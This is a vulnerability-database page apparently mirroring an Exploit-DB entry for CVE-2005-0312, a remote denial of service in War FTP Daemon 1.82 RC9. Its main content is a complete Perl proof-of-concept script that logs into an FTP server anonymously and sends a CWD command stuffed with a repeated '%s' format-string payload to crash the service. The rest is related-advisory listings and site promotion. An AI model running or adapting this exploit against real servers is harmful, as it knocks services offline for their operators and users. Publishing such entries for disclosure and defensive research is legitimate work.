Lucene search
+L

War FTP Daemon 1.8 - Remote Denial of Service

🗓️ 27 Jan 2005 00:00:00Reported by MC.IgloType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 29 Views

War FTP Daemon has a remote denial of service vulnerability due to improper exception handling.

Related
Code
ReporterTitlePublishedViews
Family
Tenable Nessus
WarFTPd < 1.82.00-RC9 CWD Command Remote Overflow
27 Jan 200500:00
nessus
Tenable Nessus
WarFTPd CWD Command Remote DoS
27 Jan 200500:00
nessus
CVE
CVE-2005-0312
10 Feb 200505:00
cve
Cvelist
CVE-2005-0312
10 Feb 200505:00
cvelist
EUVD
EUVD-2005-0313
7 Oct 202500:30
euvd
NVD
CVE-2005-0312
27 Jan 200505:00
nvd
source: https://www.securityfocus.com/bid/12384/info

War FTP Daemon is reported prone to a remote denial of service vulnerability. This issue arises because the application fails to handle exceptional conditions in a proper manner.

War FTP Daemon 1.82.00-RC9 is reported prone to this issue. It is likely that previous versions are vulnerable as well.

#!/usr/bin/perl -w
# remote DoS PoC Exploit for WarFTPD 1.82 RC9
# THX 2 barabas 4 his GoldenFTP-sploit :)
# greetings fly out to Foobar

use strict;
use Net::FTP;
my $payload="%s"x115;

my $ftp = Net::FTP->new("127.0.0.1", Debug => 1);
$ftp->login("anonymous","[email protected]");
$ftp->quot("CWD",$payload);

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

28 Apr 2013 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 22.1
EPSS0.02725
29